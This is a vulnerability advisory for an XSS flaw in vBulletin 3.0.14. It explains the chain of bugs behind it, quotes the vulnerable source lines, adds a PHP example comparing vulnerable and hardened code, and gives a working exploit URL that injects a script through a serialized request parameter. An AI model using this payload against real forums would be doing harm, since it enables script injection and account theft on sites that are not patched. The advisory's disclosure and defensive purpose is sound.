Summary
Software: vBulletin
Web Site: http://www.vBulletin.com
Versions: 3.0.14
Exploit: Available
Solution: Available
Discovered by: imei addmimistrator
Risk Level: Medium

-Description-
There is a security bug in the most powerful and common forum software, vBulletin version 3.0.14, that allows an attacker to perform an XSS attack without any limitation. The bug is the result of a series of mistakes in the kernel code and in peripheral files that cause variables to be registered in the global scope in the first moments of execution, so an attacker can initialize any variable. Because of vBulletin's careful programming style this is not exploitable at first view, but as a project I could find some entry points for exploiting the bug and converting a potential weakness into a working exploit. The exploit is possible for the following reasons, which I demonstrate below:

1. A weakness in includes/init.php lets a user bypass the anti-direct-calling check on the global.php files (there are four global.php files in vB).
2. Variables from user input are re-registered into the global scope by default.
3. A function is called with an uninitialized variable in modcp/global.php.
4. A passed variable is unserialized into the same array twice: first one member of the passed array is unserialized and processed, then another value of the passed array is unserialized into that same array again, so previously initialized values can be overwritten.
5. Finally, some of those values are not passed through htmlspecialchars in includes/adminfunctions.php (print_cp_login()).
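The chain of mistakes listed above, reduced to a stand-alone script as an added example (this is neither vBulletin's code nor the advisory author's): the percent-encoded path that slips past a substring guard, the double unserialize() that lets the second blob overwrite the keys the function itself just set, and the unescaped write into a style attribute, each beside a hardened form. The function names, the text-align attribute wrapper around white-space:nowrap, and the sample request values are assumptions constructed for illustration; where $script originates inside vBulletin is not shown on the page, so here it is simply the requested path.

```php
<?php
// Added example (not vBulletin's code): the weaknesses from the description,
// reduced to a stand-alone script, each beside a hardened form.
// Function names and the sample inputs below are constructed for illustration.

// Mistake 1: the direct-call guard in includes/init.php looks for the literal
// substring 'global.php' in $script, so a percent-encoded request path such as
// glo%62al.php is not matched. (Assumed here: $script is the requested path.)
function direct_call_blocked_weak($script)
{
    return strpos(strtolower($script), 'global.php') !== false;
}

// Hardened: decode the path first and compare the bare file name, so the
// encoding used in the request no longer matters.
function direct_call_blocked_hardened($script)
{
    $name = strtolower(basename(rawurldecode($script)));
    return $name === 'global.php';
}

// Mistakes 3 and 4: $style comes from the caller (in modcp/global.php it is an
// uninitialized $_tmp that register_globals emulation lets a request fill), and
// csscolors is unserialized over keys the function itself just set.
function fetch_stylevars_vulnerable($style)
{
    $stylevar = unserialize($style['stylevars']);
    $stylevar['textdirection'] = 'ltr';
    $stylevar['left']  = 'left';
    $stylevar['right'] = 'right';
    $stylevar = array_merge($stylevar, unserialize($style['csscolors'])); // overwrite
    return $stylevar;
}

// Hardened: require a real style record, refuse unserialize() results that are
// not arrays (and never instantiate objects), and set the fixed keys after the
// merge so the second serialized blob cannot override them.
function fetch_stylevars_hardened($style)
{
    if (!is_array($style) || !isset($style['stylevars'], $style['csscolors'])) {
        throw new InvalidArgumentException('style record missing or malformed');
    }
    $base   = unserialize($style['stylevars'], ['allowed_classes' => false]);
    $colors = unserialize($style['csscolors'], ['allowed_classes' => false]);
    if (!is_array($base) || !is_array($colors)) {
        throw new UnexpectedValueException('style blobs must unserialize to arrays');
    }
    $stylevar = array_merge($base, $colors);
    $stylevar['textdirection'] = 'ltr';
    $stylevar['left']  = 'left';
    $stylevar['right'] = 'right';
    return $stylevar;
}

// Mistake 5: print_cp_login() writes $stylevar['right'] into a style attribute
// as-is (the text-align wrapper is assumed); the fix is to escape at output.
function login_style_attr_vulnerable(array $stylevar)
{
    return '<td style="text-align:' . $stylevar['right'] . '; white-space:nowrap">';
}

function login_style_attr_hardened(array $stylevar)
{
    $right = htmlspecialchars($stylevar['right'], ENT_QUOTES, 'UTF-8');
    return '<td style="text-align:' . $right . '; white-space:nowrap">';
}

// --- demonstration with constructed inputs ---------------------------------
$request = '/forum/modcp/glo%62al.php';
printf("weak guard blocks %s: %s\n", $request, var_export(direct_call_blocked_weak($request), true));
printf("hardened guard blocks %s: %s\n", $request, var_export(direct_call_blocked_hardened($request), true));

// A request-supplied $_tmp whose csscolors blob carries an attribute-breaking 'right'.
$tmp = [
    'stylevars' => serialize([]),
    'csscolors' => serialize(['right' => '"><x>']),
];
echo login_style_attr_vulnerable(fetch_stylevars_vulnerable($tmp)), "\n"; // attribute broken open
echo login_style_attr_hardened(fetch_stylevars_hardened($tmp)), "\n";     // 'right' kept, output escaped

// The uninitialized-$_tmp case from modcp/global.php: the hardened loader refuses it.
try {
    fetch_stylevars_hardened(null);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```

Run it with the PHP CLI: the weak guard reports false for the encoded path while the hardened one reports true; the vulnerable loader lets the csscolors blob replace 'right' and the value lands unescaped inside the attribute, whereas the hardened loader keeps the fixed keys fixed and escapes whatever does reach the attribute. Note that the output escaping alone would already stop the XSS; the loader changes close the overwrite path independently.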
-See Also-
includes/init.php {~290}

    if (!defined('THIS_SCRIPT') AND strpos(strtolower($script), 'global.php') !== false)
    {
        die('Critical Error: global.php must not be called directly.');
    }

**********************
includes/init.php {~100}

    // re-register globals
    // this code should not be necessary by final version
    if (!defined('NO_REGISTER_GLOBALS'))
    {
        // define NO_REGISTER_GLOBALS to emulate register_globals as off
        // Censored because of length

**********************
modcp/global.php {~40-50}

    $stylevar = fetch_stylevars($_tmp, $bbuserinfo); // passing an uninitialized variable to the function

**********************
includes/function.php {~3630}

    function fetch_stylevars(&$style, $userinfo)
    {
        // Censored
        $stylevar = unserialize($style['stylevars']);
        $stylevar['textdirection'] = 'ltr';
        $stylevar['left'] = 'left';
        $stylevar['right'] = 'right';
        // Censored
        $stylevar = array_merge($stylevar, unserialize($style['csscolors'])); // overwrite mistake! ;))

**********************
includes/adminfunctions.php {~25}

    function print_cp_login()
    {
        // Censored
    {~130}
        ; white-space:nowrap>

-Exploit-
forum/mods/glo%62al.php?_tmp[csscolors]=a:1:{s:5:%22right%22;s:27:%22 %22%3E%3Cscript%3Ealert(1)%3C/script%3E%22;}

-Solution-
Upgrade to the vendor-provided patch.

-Credit-
Discovered by: imei addmimistrator
addmimistrator(4}gmail(O}com
www.myimei.com
myimei.com/security